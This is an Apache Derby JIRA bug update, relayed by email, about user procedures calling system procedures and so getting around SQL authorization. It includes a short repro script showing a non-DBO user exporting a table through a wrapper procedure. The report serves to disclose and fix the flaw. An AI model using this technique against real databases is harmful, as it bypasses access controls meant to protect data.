[jira] [Updated] (DERBY-6616) User procedures can call system procedures, circumventing SQL authorization.

Rick Hillegas (JIRA) Tue, 17 Jun 2014 06:37:28 -0700

     [ 
https://issues.apache.org/jira/browse/DERBY-6616?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]


Rick Hillegas updated DERBY-6616:
---------------------------------

    Attachment: SystemProcWrapper.java

Attaching SystemProcWrapper.java, which contains a procedure wrapping 
SYSCS_UTIL.SYSCS_EXPORT_TABLE. The following script shows how to use this 
procedure to circumvent SQL authorization checks on the system procedure:

{noformat}
connect 'jdbc:derby:memory:db1;create=true;user=test_dbo';

call syscs_util.syscs_create_user( 'TEST_DBO', 'test_dbopassword' );
call syscs_util.syscs_create_user( 'RUTH', 'ruthpassword' );

-- shutdown in order to enable NATIVE authentication
connect 'jdbc:derby:memory:db1;shutdown=true';

connect 'jdbc:derby:memory:db1;user=test_dbo;password=test_dbopassword' as dbo;

create table t( a int );
insert into t values ( 1 );

grant select on t to public;

connect 'jdbc:derby:memory:db1;user=ruth;password=ruthpassword' as ruth;

-- ruth can't execute this procedure directly
call syscs_util.syscs_export_table( 'TEST_DBO', 'T', 'z.dat', null, null, null 
);

create procedure wrapSYSCS_EXPORT_TABLE
(
    in schemaname  varchar(128),
    in tablename varchar(128),
    in filename varchar(32672),
    in columndelimiter char(1),
    in characterdelimiter char(1),
    in codeset varchar(128)
)
language java parameter style java reads sql data
external name 'SystemProcWrapper.wrapSYSCS_EXPORT_TABLE';

-- but she can execute this wrapper procedure
call wrapSYSCS_EXPORT_TABLE( 'TEST_DBO', 'T', 'z.dat', null, null, null );
{noformat}


> User procedures can call system procedures, circumventing SQL authorization.
> ----------------------------------------------------------------------------
>
>                 Key: DERBY-6616
>                 URL: https://issues.apache.org/jira/browse/DERBY-6616
>             Project: Derby
>          Issue Type: Bug
>          Components: SQL
>    Affects Versions: 10.11.0.0
>            Reporter: Rick Hillegas
>         Attachments: SystemProcWrapper.java
>
>
> System procedures are implemented as public static methods in 
> org.apache.derby.catalog.SystemProcedures. These methods can be called by 
> code in user-written procedures. This allows a user-written procedure to 
> circumvent the SQL authorization checks which are supposed to limit some 
> procedures to being called only by the DBO. I will attach a repro.



--
This message was sent by Atlassian JIRA
(v6.2#6252)

[jira] [Updated] (DERBY-6616) User procedures can call system procedures, circumventing SQL authorization.

Reply via email to